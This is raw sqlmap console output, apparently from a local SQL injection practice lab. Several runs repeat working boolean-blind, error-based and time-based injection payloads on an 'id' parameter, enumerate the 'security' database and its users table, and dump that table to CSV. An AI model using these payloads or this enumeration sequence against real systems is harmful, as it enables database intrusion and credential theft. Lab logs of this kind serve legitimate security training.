[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:30:02 /2023-04-23/
[19:30:03] [INFO] resuming back-end DBMS 'mysql' [19:30:03] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: id=1" AND 3744=3744#
Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: id=1" AND GTID_SUBSET(CONCAT(0x7176626a71,(SELECT (ELT(7253=7253,1))),0x716a717171),7253)-- vAnE
Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1" AND (SELECT 4714 FROM (SELECT(SLEEP(5)))bfJG)-- Mruu --- [19:30:03] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.39, PHP 5.5.9 back-end DBMS: MySQL >= 5.6 [19:30:03] [INFO] fetched data logged to text files under 'C:\Users\86138\AppData\Local\sqlmap\output\127.0.0.2'
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:30:55 /2023-04-23/
[19:30:55] [INFO] resuming back-end DBMS 'mysql' [19:30:55] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: id=1" AND 3744=3744#
Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: id=1" AND GTID_SUBSET(CONCAT(0x7176626a71,(SELECT (ELT(7253=7253,1))),0x716a717171),7253)-- vAnE
Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1" AND (SELECT 4714 FROM (SELECT(SLEEP(5)))bfJG)-- Mruu --- [19:30:56] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.39, PHP 5.5.9 back-end DBMS: MySQL >= 5.6 [19:30:56] [INFO] fetching current database [19:30:56] [INFO] retrieved: 'security' current database: 'security' [19:30:56] [INFO] fetched data logged to text files under 'C:\Users\86138\AppData\Local\sqlmap\output\127.0.0.2'
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:31:15 /2023-04-23/
[19:31:15] [INFO] resuming back-end DBMS 'mysql' [19:31:15] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: id=1" AND 3744=3744#
Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: id=1" AND GTID_SUBSET(CONCAT(0x7176626a71,(SELECT (ELT(7253=7253,1))),0x716a717171),7253)-- vAnE
Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1" AND (SELECT 4714 FROM (SELECT(SLEEP(5)))bfJG)-- Mruu --- [19:31:16] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.39, PHP 5.5.9 back-end DBMS: MySQL >= 5.6 [19:31:16] [INFO] fetching tables for database: 'security' [19:31:16] [INFO] retrieved: 'emails' [19:31:16] [INFO] retrieved: 'referers' [19:31:16] [INFO] retrieved: 'uagents' [19:31:16] [INFO] retrieved: 'users' Database: security [4 tables] +----------+ | emails | | referers | | uagents | | users | +----------+
[19:31:16] [INFO] fetched data logged to text files under 'C:\Users\86138\AppData\Local\sqlmap\output\127.0.0.2'
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:31:43 /2023-04-23/
[19:31:43] [INFO] resuming back-end DBMS 'mysql' [19:31:43] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: id=1" AND 3744=3744#
Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: id=1" AND GTID_SUBSET(CONCAT(0x7176626a71,(SELECT (ELT(7253=7253,1))),0x716a717171),7253)-- vAnE
Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1" AND (SELECT 4714 FROM (SELECT(SLEEP(5)))bfJG)-- Mruu --- [19:31:43] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.5.9, Apache 2.4.39 back-end DBMS: MySQL >= 5.6 [19:31:43] [INFO] fetching columns for table 'users' in database 'security' [19:31:43] [INFO] resumed: 'id' [19:31:43] [INFO] resumed: 'int(3)' [19:31:43] [INFO] resumed: 'username' [19:31:43] [INFO] resumed: 'varchar(20)' [19:31:43] [INFO] resumed: 'password' [19:31:43] [INFO] resumed: 'varchar(20)' Database: security Table: users [3 columns] +----------+-------------+ | Column | Type | +----------+-------------+ | id | int(3) | | password | varchar(20) | | username | varchar(20) | +----------+-------------+
[19:31:43] [INFO] fetched data logged to text files under 'C:\Users\86138\AppData\Local\sqlmap\output\127.0.0.2'
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:31:55 /2023-04-23/
[19:31:55] [INFO] resuming back-end DBMS 'mysql' [19:31:55] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: id=1" AND 3744=3744#
Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: id=1" AND GTID_SUBSET(CONCAT(0x7176626a71,(SELECT (ELT(7253=7253,1))),0x716a717171),7253)-- vAnE
Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1" AND (SELECT 4714 FROM (SELECT(SLEEP(5)))bfJG)-- Mruu --- [19:31:55] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.39, PHP 5.5.9 back-end DBMS: MySQL >= 5.6 [19:31:55] [INFO] fetching columns for table 'users' in database 'security' [19:31:55] [INFO] resumed: 'id' [19:31:55] [INFO] resumed: 'int(3)' [19:31:55] [INFO] resumed: 'username' [19:31:55] [INFO] resumed: 'varchar(20)' [19:31:55] [INFO] resumed: 'password' [19:31:55] [INFO] resumed: 'varchar(20)' Database: security Table: users [3 columns] +----------+-------------+ | Column | Type | +----------+-------------+ | id | int(3) | | password | varchar(20) | | username | varchar(20) | +----------+-------------+
[19:31:55] [INFO] table 'security.users' dumped to CSV file 'C:\Users\86138\AppData\Local\sqlmap\output\127.0.0.2\dump\security\users.csv' [19:31:55] [INFO] fetched data logged to text files under 'C:\Users\86138\AppData\Local\sqlmap\output\127.0.0.2'